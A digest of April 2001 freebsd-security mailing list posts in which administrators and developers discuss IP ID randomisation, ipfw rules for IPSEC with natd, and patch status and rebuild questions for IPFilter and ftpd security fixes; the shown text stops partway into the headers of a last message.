freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG Subject: Re: non-random IP IDs Message-ID: <20010416024805.A688@xor.obsecurity.org> References: <001f01c0c30b$805b0840$d2e2fdce@netrex.com> <20010416020311.A1292@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="rwEMma7ioTxnRzrJ" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010416020311.A1292@xor.obsecurity.org>; from kris@obsecurity.org on Mon, Apr 16, 2001 at 02:03:11AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --rwEMma7ioTxnRzrJ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Apr 16, 2001 at 02:03:11AM -0700, Kris Kennaway wrote: > Here's a patch ported from OpenBSD which randomizes this (supposedly > such that it respects the constraint of not wrapping within the > prescribed time period). I should wrap it in a sysctl, I guess. >=20 > http://www.freebsd.org/~kris/ipid.patch Okay, I did this and updated the patch, with the sysctl defaulting to off since the random algorithm does add some amount of overhead. > Comments? Kris --rwEMma7ioTxnRzrJ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE62r/UWry0BWjoQKURAqEhAKDMfAXAwJLg+qU1Wt9RVH9q6Oi+EACeKXRN EA9+LNS3If04gRZFQ9YTGis= =l1UB -----END PGP SIGNATURE----- --rwEMma7ioTxnRzrJ-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 3:24: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from internal.mail.telinco.net (internal.mail.telinco.net [212.1.128.4]) by hub.freebsd.org (Postfix) with ESMTP id 9152037B424 for ; Mon, 16 Apr 2001 03:24:02 -0700 (PDT) (envelope-from b.candler@pobox.com) Received: from ppp-dp1-mk-66.access.uk.worldonline.com ([212.74.113.66] helo=bloodhound.uk.worldonline.com) by internal.mail.telinco.net with esmtp (Exim 3.02 #1) id 14p6Ar-000J3h-00; Mon, 16 Apr 2001 11:24:01 +0100 Received: from brian by bloodhound.uk.worldonline.com with local (Exim 3.22 #1) id 14p6Ao-0003Zn-00; Mon, 16 Apr 2001 11:23:58 +0100 Date: Mon, 16 Apr 2001 11:23:58 +0100 From: Brian Candler To: Lowell Gilbert Cc: Rasputin , freebsd-security@freebsd.org Subject: Re: Interaction between ipfw, IPSEC and natd Message-ID: <20010416112358.A13561@linnet.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Some forms of IPSEC have fundamental problems with packet rewriting, > which means that NAT is extremely hard to use in an IPSEC environment. > Notably, end-to-end IPSEC modes are broken, although router-based > tunnels can be a problem depending on whether the NAT rewriting occurs > before or after the IPSEC headers are applied. > > Even without NAT, though, firewalls are a little tricky to configure > for IPSEC packets. This is because the firewall can't see the > protocol ports (or even the protocol, for that matter) in the packet, Ah, it seems I wasn't clear :-) It's actually a very simple scenario, and I do not need IPSEC packets to be routed through the firewall at all. There are cleartext sessions which need NAT to be able to browse the outside Internet, and then cleartext packets which are IPSEC-tunnelled from one private network to another, like this: Internet Internet ^ . . . . . . . . . . ^ | , IPSEC tunnel ` | +----------+ +----------+ | Firewall | | Firewall | +----------+ +----------+ | | ---+--- ---+--- Office1 Office2 10.0.1.0/24 10.0.2.0/24 Now, I have done a bit of experimentation and found the following. 1. Packets which are diverted to natd are reinjected into the ipfw ruleset at the following rule (actually 'man 8 natd' does say this). The packets do retain their 'in via ' tag. 'man 4 divert' documents the mechanism which makes this possible. 2. Incoming IPSEC packets pass _twice_ through the ipfw rules: once in their encapsulated form (protocol 50), and when decrypted they pass through the whole ruleset again, retaining their 'in via ' tag. The second rule makes things a bit of a mess. For starters, you need two rules to permit IPSEC traffic through, one in encrypted and one in decrypted form: add 1000 allow esp from to in via fxp0 add 1010 allow ip from 10.0.1.0/24 to 10.0.2.0/24 in via fxp0 Now, it seems ipfw cannot tell the difference between a packet which came 'in via fxp0' in the clear, or 'in via fxp0' as IPSEC which was successfully decrypted and authenticated. It is not clear what happens if someone spoofs a packet with a 10.0.x source and dest address and injects it into the outside interface of the firewall; hopefully the IPSEC policy (/require) catches this case and drops the packet, but I would feel much happier with an explicit ipfw antispoofing rule. Then you need to put natd _after_ this so that the IPSEC tunneled traffic is not subject to NAT: add 1020 divert 8668 ip from any to any via fxp0 i.e. rule 1010 catches the tunnel-decrypted traffic. Of course, this only works because we know the IP address space used at each end of the tunnel; these rules could get complicated in a more complex environment than the one shown above, and it would be a pain keeping the SPD and ipfw rules in sync. I have done some poking around, and it seems that NetBSD had the same issue: http://www.netbsd.org/Documentation/network/ipsec/#ipf-interaction They made a change in February, and their new behaviour is: "ipf(4) looks at packets in native wire format only. ipf(4) looks at packets before IPsec processing on inbound, and after IPsec processing on outbound." This looks reasonable to me, except that it appears impossible to have an 'untrusted IPSEC tunnel' (that is, a tunnel which you want to filter traffic from before allowing it in) Since you might want to have different policies for different tunnels, it would be very nice for ipfw to be able to test which tunnel traffic came through (e.g. "in via x.x.x.x" where x.x.x.x is the IP address of the remote tunnel endpoint). Just a thought. Anyway, I think my original point still stands - whatever FreeBSD does, all this needs to be documented properly :-) Regards, Brian. P.S. It appears that all this has been discussed before, so sorry for the overlap... http://docs.FreeBSD.org/cgi/getmsg.cgi?fetch=116841+0+/usr/local/www/db/text/2001/freebsd-security/20010325.freebsd-security P.P.S. OpenBSD appears to pass traffic through the filters twice, but you can differentiate IPSEC traffic by looking for the 'enc0' interface: http://www.openbsd.org/cgi-bin/man.cgi?query=vpn&apropos=0&sektion=0&format=html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 5:44: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id E5F2137B424 for ; Mon, 16 Apr 2001 05:43:59 -0700 (PDT) (envelope-from subscr@morning.ru) Received: from NIC1 (early.morning.ru [195.161.98.238]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id UAA90182; Mon, 16 Apr 2001 20:14:51 +0800 (KRAST) (envelope-from subscr@morning.ru) Date: Mon, 16 Apr 2001 20:14:23 +0700 From: Igor Podlesny X-Mailer: The Bat! (v1.51) UNREG / CD5BF9353B3B7091 Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <5134818957.20010416201423@morning.ru> To: Darren Reed Cc: freebsd-security@FreeBSD.ORG Subject: Re[2]: URGENT: Serious bug in IPFilter (fwd) In-Reply-To: <200104070644.QAA24197@cairo.anu.edu.au> References: <200104070644.QAA24197@cairo.anu.edu.au> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! Guys, what's going on? The patch still not be available under CVS-tree yet?! >> It looks like darrenr committed a fix to HEAD, but it's not MFC-ed yet >> AFAIK: DR> This has since happened with jkh's approval. DR> Hmmm, maybe I should have mentioned that in the commit (doh!) DR> Darren -- Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 5:50:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 24D3B37B424 for ; Mon, 16 Apr 2001 05:50:49 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by peitho.fxp.org (Postfix, from userid 1501) id 7D4ED1360C; Mon, 16 Apr 2001 08:50:48 -0400 (EDT) Date: Mon, 16 Apr 2001 08:50:48 -0400 From: Chris Faulhaber To: Igor Podlesny Cc: Darren Reed , freebsd-security@FreeBSD.ORG Subject: Re: URGENT: Serious bug in IPFilter (fwd) Message-ID: <20010416085048.A66477@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , Igor Podlesny , Darren Reed , freebsd-security@FreeBSD.ORG References: <200104070644.QAA24197@cairo.anu.edu.au> <5134818957.20010416201423@morning.ru> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="tKW2IUtsqtDRztdT" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <5134818957.20010416201423@morning.ru>; from subscr@morning.ru on Mon, Apr 16, 2001 at 08:14:23PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --tKW2IUtsqtDRztdT Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Apr 16, 2001 at 08:14:23PM +0700, Igor Podlesny wrote: >=20 > Hi! >=20 > Guys, what's going on? > The patch still not be available under CVS-tree yet?! >=20 As previously stated, the fixes have been committed to -current and -stable. For example: Revision 1.10.2.4 / (download) - annotate - [select for diffs], Sat Apr 7 0= 3:40:31 2001 UTC (9 days, 9 hours ago) by darrenr=20 Branch: RELENG_4=20 fix security hole created by fragment cache Revision 1.15 / (download) - annotate - [select for diffs], Fri Apr 6 15:52= :28 2001 UTC (9 days, 20 hours ago) by darrenr=20 Branch: MAIN=20 CVS Tags: HEAD=20 fix security hole created by fragment cache =46rom http://www.FreeBSD.org/cgi/cvsweb.cgi/src/sys/netinet/ip_frag.c --=20 Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org --tKW2IUtsqtDRztdT Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: FreeBSD: The Power To Serve iEYEARECAAYFAjra6qgACgkQObaG4P6BelBBpACbBKswsn4WLlbQnIgfzT5BOXyT 0d4An2owclAEJVhvpSF/6FqQwQC+6XaR =YF+H -----END PGP SIGNATURE----- --tKW2IUtsqtDRztdT-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 6:47:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id E339037B423 for ; Mon, 16 Apr 2001 06:47:37 -0700 (PDT) (envelope-from subscr@morning.ru) Received: from NIC1 (early.morning.ru [195.161.98.238]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id VAA93407; Mon, 16 Apr 2001 21:50:52 +0800 (KRAST) (envelope-from subscr@morning.ru) Date: Mon, 16 Apr 2001 21:50:25 +0700 From: Igor Podlesny X-Mailer: The Bat! (v1.51) UNREG / CD5BF9353B3B7091 Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <12940580121.20010416215025@morning.ru> To: Chris Faulhaber Cc: freebsd-security@FreeBSD.ORG Subject: Re[2]: URGENT: Serious bug in IPFilter (fwd) In-Reply-To: <20010416094147.A15919@peitho.fxp.org> References: <200104070644.QAA24197@cairo.anu.edu.au> <5134818957.20010416201423@morning.ru> <20010416085048.A66477@peitho.fxp.org> <12439616084.20010416213421@morning.ru> <20010416094147.A15919@peitho.fxp.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org CF> On Mon, Apr 16, 2001 at 09:34:21PM +0700, Igor Podlesny wrote: >> >> >> CF> On Mon, Apr 16, 2001 at 08:14:23PM +0700, Igor Podlesny wrote: >> >> >> >> Hi! >> >> >> >> Guys, what's going on? >> >> The patch still not be available under CVS-tree yet?! >> >> >> >> Hi! >> Hm... it is very strange to me then, cause my ip_frag.c after CVSuping >> is: >> >> #if !defined(lint) >> static const char sccsid[] = "@(#)ip_frag.c 1.11 3/24/96 (C) 1993-2000 Darren >> Reed"; >> static const char rcsid[] = "@(#)$Id: ip_frag.c,v 2.10.2.7 2000/11/27 10:26:56 >> darrenr Exp $"; >> #endif >> >> and I did CVSup just about an hour ago! >> >> what could the problem be? >> CF> Not sure. CF> What tag are you specifying? RELENG_4 CF> Have you tried another CF> cvsup server? hm... i used cvsup7.freebsd.org now I'll try cvsup2... I think they are supposed to keep things in sync... CF> Also, this should really be kept on the list since I am not CF> a cvs/cvsup guru. ok Anybody CVSuping, answer, plz! -- Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 6:56:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id 8E65E37B43E for ; Mon, 16 Apr 2001 06:56:10 -0700 (PDT) (envelope-from poige@morning.ru) Received: from NIC1 (early.morning.ru [195.161.98.238]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id VAA93688; Mon, 16 Apr 2001 21:59:30 +0800 (KRAST) (envelope-from poige@morning.ru) Date: Mon, 16 Apr 2001 21:59:02 +0700 From: Igor Podlesny X-Mailer: The Bat! (v1.51) UNREG / CD5BF9353B3B7091 Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <1241097685.20010416215902@morning.ru> To: Chris Faulhaber Cc: freebsd-security@FreeBSD.ORG Subject: Re[3]: URGENT: Serious bug in IPFilter (fwd) In-Reply-To: <12940580121.20010416215025@morning.ru> References: <200104070644.QAA24197@cairo.anu.edu.au> <5134818957.20010416201423@morning.ru> <20010416085048.A66477@peitho.fxp.org> <12439616084.20010416213421@morning.ru> <20010416094147.A15919@peitho.fxp.org> <12940580121.20010416215025@morning.ru> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Excuse me, everybody, I had messed things up -- /usr/src/sys/netinet/ip_frag.c and /usr/src/contrib/ipfilter/... I'm really sorry... CF>> On Mon, Apr 16, 2001 at 09:34:21PM +0700, Igor Podlesny wrote: >>> >>> >>> CF> On Mon, Apr 16, 2001 at 08:14:23PM +0700, Igor Podlesny wrote: >>> >> >>> >> Hi! >>> >> >>> >> Guys, what's going on? >>> >> The patch still not be available under CVS-tree yet?! >>> >> >>> >>> Hi! >>> Hm... it is very strange to me then, cause my ip_frag.c after CVSuping >>> is: >>> >>> #if !defined(lint) >>> static const char sccsid[] = "@(#)ip_frag.c 1.11 3/24/96 (C) 1993-2000 Darren >>> Reed"; >>> static const char rcsid[] = "@(#)$Id: ip_frag.c,v 2.10.2.7 2000/11/27 10:26:56 >>> darrenr Exp $"; >>> #endif >>> >>> and I did CVSup just about an hour ago! >>> >>> what could the problem be? >>> CF>> Not sure. CF>> What tag are you specifying? IP> RELENG_4 CF>> Have you tried another CF>> cvsup server? IP> hm... i used cvsup7.freebsd.org IP> now I'll try cvsup2... IP> I think they are supposed to keep things in sync... CF>> Also, this should really be kept on the list since I am not CF>> a cvs/cvsup guru. IP> ok IP> Anybody CVSuping, answer, plz! -- Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 7:37:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 248BD37B43F; Mon, 16 Apr 2001 07:37:25 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from [127.0.0.1] (helo=softweyr.com ident=67b8f9b839749317407b58ec008f73e6) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 14pA7d-0000Vq-00; Mon, 16 Apr 2001 08:36:58 -0600 Message-ID: <3ADB0389.5D236D88@softweyr.com> Date: Mon, 16 Apr 2001 08:36:57 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: freebsd-security@FreeBSD.ORG, net@FreeBSD.org Subject: Re: non-random IP IDs References: <001f01c0c30b$805b0840$d2e2fdce@netrex.com> <20010416020311.A1292@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > On Thu, Apr 12, 2001 at 12:40:32AM -0500, Mike Silbersack wrote: > > > Each IP packet sent has with it a 16-bit ID. The numbers must remain > > unique over a short period of time so fragmentation can work properly. As > > such, everything except recent openbsds simple increments the id by 1 for > > each packet sent out. > > > > As a result, you can tell the number of packets sent on an idle host by > > seeing the difference in id numbers for the packets it sends back to you. > > It's not really that important of an issue, don't worry about it. > > Here's a patch ported from OpenBSD which randomizes this (supposedly > such that it respects the constraint of not wrapping within the > prescribed time period). I should wrap it in a sysctl, I guess. > > http://www.freebsd.org/~kris/ipid.patch > > Comments? Looks clean. The only comment I can find is: Why not have ip_randomid() return the ID in network byte order? It would save several HTONS macros trailing the ip_randomid() calls. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 8: 3:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.fdma.com (mail.fdma.com [216.241.67.73]) by hub.freebsd.org (Postfix) with ESMTP id E2E1C37B43C for ; Mon, 16 Apr 2001 08:03:10 -0700 (PDT) (envelope-from scheidell@fdma.com) Received: from MIKELT (mikelt.fdma.lan [192.168.3.5]) by mail.fdma.com (8.11.3/8.11.3) with SMTP id f3GF38a40711 for ; Mon, 16 Apr 2001 11:03:09 -0400 (EDT) Message-ID: <000901c0c686$59ac3830$0503a8c0@fdma.com> From: "Michael Scheidell" To: Subject: Fw: Please help with ftpd glob hack Date: Mon, 16 Apr 2001 11:02:40 -0400 Organization: Florida Datamation, Inc. MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have a 4.2-REL on intel and would like to get either the new ftpd or the files to compile it I don't have enough space on this embedded system for the full cvsup (i tried) Also, I tried looking at the various sources to see where it might be I compiled some with dates of march28, but 'version' still shows 600LS Also if possible, a newer version of ntpd. thank you in advance for your help. ----- Original Message ----- From: "Michael Scheidell" To: Sent: Saturday, April 14, 2001 4:13 PM Subject: Please help > Please help. > I have tried. > I don't have the hd space to do a full CVSUP, but I would like to find a > compiled version of ftpd for 4.2-release or 4.2stable, as mentioned in the > cert advisory. > > > ----- Original Message ----- > From: "Michael Scheidell" > To: > Sent: Tuesday, April 10, 2001 10:34 AM > Subject: RE: CERT Advisory CA-2001-07 > > > > According to > > > > CERT Advisory CA-2001-07, Freebsd has fixed (as of a little after midnight > > today? 4/10/2001? ) a glob problem in ftpd in the 'current' and stable > > release > > > > I looked everywhere I could think of and best I could find is the source > on > > SOME of the ftpx.freebsd.org/ sites has some new header files in > > /usr/include and source in ../libexec/ftpd dated March 28th and 27th. > > > > These still compile with 'version' 6.00LS (and, in fact, I think one of > the > > ftp server is still running that one?) > > > > Can you tell me where I can find the binary for 9386/ 4.2-release or 4.2 > > stable, or sources for the fix ? thanks. > > > > --- > > Michael Scheidell > > Florida Datamation, Inc. > > scheidell@fdma.com / 1+(561) 368-9561 > > Internet Security and Consulting > > See updated IT Security News at http://www.fdma.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 8:16: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id D7E4937B424 for ; Mon, 16 Apr 2001 08:16:04 -0700 (PDT) (envelope-from str@giganda.komkon.org) Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id LAA70850 for security@FreeBSD.ORG; Mon, 16 Apr 2001 11:16:06 -0400 (EDT) (envelope-from str) Date: Mon, 16 Apr 2001 11:16:06 -0400 (EDT) From: Igor Roshchin Message-Id: <200104161516.LAA70850@giganda.komkon.org> To: security@FreeBSD.ORG Subject: Wu-ftpd and Remote BSD ftpd glob exploit In-Reply-To: <20010416112702.W700@riget.scene.pl> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Can anybody, please, tell explicitly, or point me to a posting/URL with an answer to the question: "Is Wu-ftpd server [and derived from it] also vulnerable ? " So far I saw neither positive nor negative identification, but maybe I missed one. Thanks, Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 8:21:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 9433D37B446 for ; Mon, 16 Apr 2001 08:21:51 -0700 (PDT) (envelope-from roman@xpert.com) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.13 #1) id 14pAtY-0001H4-00; Mon, 16 Apr 2001 18:26:28 +0300 Date: Mon, 16 Apr 2001 18:26:28 +0300 (IDT) From: Roman Shterenzon To: Alfred Perlstein Cc: Subject: Re: 4.3rc2: if=/etc/issue in /etc/gettytab is not respected In-Reply-To: <20010403160232.I12164@fw.wintelcom.net> Message-ID: Organization: Xpert UNIX Systems Ltd. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org So I guess the RELEASE will be made with this bug :( On Tue, 3 Apr 2001, Alfred Perlstein wrote: > * Roman Shterenzon [010403 15:35] wrote: > > With enough attention and code analysis, that could be made before > > 4.3-RELEASE. There's almost two weeks left, and many people who are > > willing to test it. Me for example :) > > There's basically two telnetd's in the source tree. When you > compile and install the one from src/secure/libexec/telnetd you > get one that doesn't respect the if= directive. It looks like > it doesn't even respect the other settings, something to do > with the USER environment variable. > > I've moved this to the security list in an effort to get this > explained. > > Anyone know why this going on? > > Basically in "normal" (src/libexec/telnetd.c) > this: > if (getenv("USER")) > hostinfo = 0; > is false, but under "crypto" (src/crypto/telnet/telnetd/telnetd.c) > it's true and therefore doesn't display the login info. > > > -- > -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] > Instead of asking why a piece of software is using "1970s technology," > start asking why software is ignoring 30 years of accumulated wisdom. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 8:48:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from ashburn.skiltech.com (ashburn.skiltech.com [216.235.79.239]) by hub.freebsd.org (Postfix) with ESMTP id 4186637B423 for ; Mon, 16 Apr 2001 08:48:46 -0700 (PDT) (envelope-from minter@ashburn.skiltech.com) Received: (from minter@localhost) by ashburn.skiltech.com (8.11.1/8.11.1) id f3GFeVh06557; Mon, 16 Apr 2001 11:40:31 -0400 (EDT) (envelope-from minter) Date: Mon, 16 Apr 2001 11:40:31 -0400 (EDT) From: "H. Wade Minter" X-X-Sender: To: Subject: Rebuilding FTPD Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What's the procedure for rebuilding ftpd after a cvsup to fix the globbing bug? I tried "cd /usr/src/libexec/ftpd && make install", but that didn't work. I'm running 4-STABLE. Thanks, Wade To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 8:54:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from calliope.cs.brandeis.edu (calliope.cs.brandeis.edu [129.64.3.189]) by hub.freebsd.org (Postfix) with ESMTP id 4950937B43C for ; Mon, 16 Apr 2001 08:54:37 -0700 (PDT) (envelope-from meshko@calliope.cs.brandeis.edu) Received: from localhost (meshko@localhost) by calliope.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id LAA17977; Mon, 16 Apr 2001 11:54:32 -0400 Date: Mon, 16 Apr 2001 11:54:32 -0400 (EDT) From: Mikhail Kruk To: "H. Wade Minter" Cc: Subject: Re: Rebuilding FTPD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org MY guess would be that you need to cd /usr/src/lib/libc/ and make install there. Please note that I havn't tried it and it very well may break something for you. > What's the procedure for rebuilding ftpd after a cvsup to fix the globbing > bug? I tried "cd /usr/src/libexec/ftpd && make install", but that didn't > work. I'm running 4-STABLE. > > Thanks, > Wade > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 9:45:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from areca.wanadoo.fr (smtp-rt-4.wanadoo.fr [193.252.19.156]) by hub.freebsd.org (Postfix) with ESMTP id 210AF37B43C for ; Mon, 16 Apr 2001 09:45:22 -0700 (PDT) (envelope-from khaddad@wanadoo.fr) Received: from antholoma.wanadoo.fr (193.252.19.153) by areca.wanadoo.fr; 16 Apr 2001 18:45:20 +0200 Received: from khalil (193.251.55.96) by antholoma.wanadoo.fr; 16 Apr 2001 18:44:42 +0200 Message-ID: <002701c0c694$6774ef30$0200a8c0@khalil> From: "Khalil Haddad" To: Subject: FTP - block outer connections Date: Mon, 16 Apr 2001 18:43:44 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello all i got an FBSD box running FTPD I would like to listen only to ONE of my nic cards , ie the one that is not connected to the net anyone can help me securing it ? thanx To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 9:49:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 0B50537B42C for ; Mon, 16 Apr 2001 09:49:10 -0700 (PDT) (envelope-from fpscha@ns1.via-net-works.net.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id NAA26855; Mon, 16 Apr 2001 13:51:34 -0300 (ART) From: Fernando Schapachnik Message-Id: <200104161651.NAA26855@ns1.via-net-works.net.ar> Subject: Re: FTP - block outer connections In-Reply-To: <002701c0c694$6774ef30$0200a8c0@khalil> "from Khalil Haddad at Apr 16, 2001 06:43:44 pm" To: Khalil Haddad Date: Mon, 16 Apr 2001 13:51:33 -0300 (ART) Cc: security@FreeBSD.ORG Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Look at man 5 hosts_access, this should help. Regards. En un mensaje anterior, Khalil Haddad escribió: > Hello all > i got an FBSD box running FTPD > I would like to listen only to ONE of my nic cards , ie the one that is not > connected to the net anyone can help me securing it ? > > thanx > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > Fernando P. Schapachnik Planificación de red y tecnología VIA NET.WORKS ARGENTINA S.A. fschapachnik@vianetworks.com.ar Tel.: (54-11) 4323-3381 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 10:32:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f68.law3.hotmail.com [209.185.241.68]) by hub.freebsd.org (Postfix) with ESMTP id 2337D37B422 for ; Mon, 16 Apr 2001 10:32:38 -0700 (PDT) (envelope-from merkury55@hotmail.com) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 16 Apr 2001 10:32:37 -0700 Received: from 4.40.152.183 by lw3fd.law3.hotmail.msn.com with HTTP; Mon, 16 Apr 2001 17:32:37 GMT X-Originating-IP: [4.40.152.183] From: "Nick Mazza" To: security@FreeBSD.ORG Subject: FreeBSD Login Date: Mon, 16 Apr 2001 10:32:37 -0700 Mime-Version: 1.0 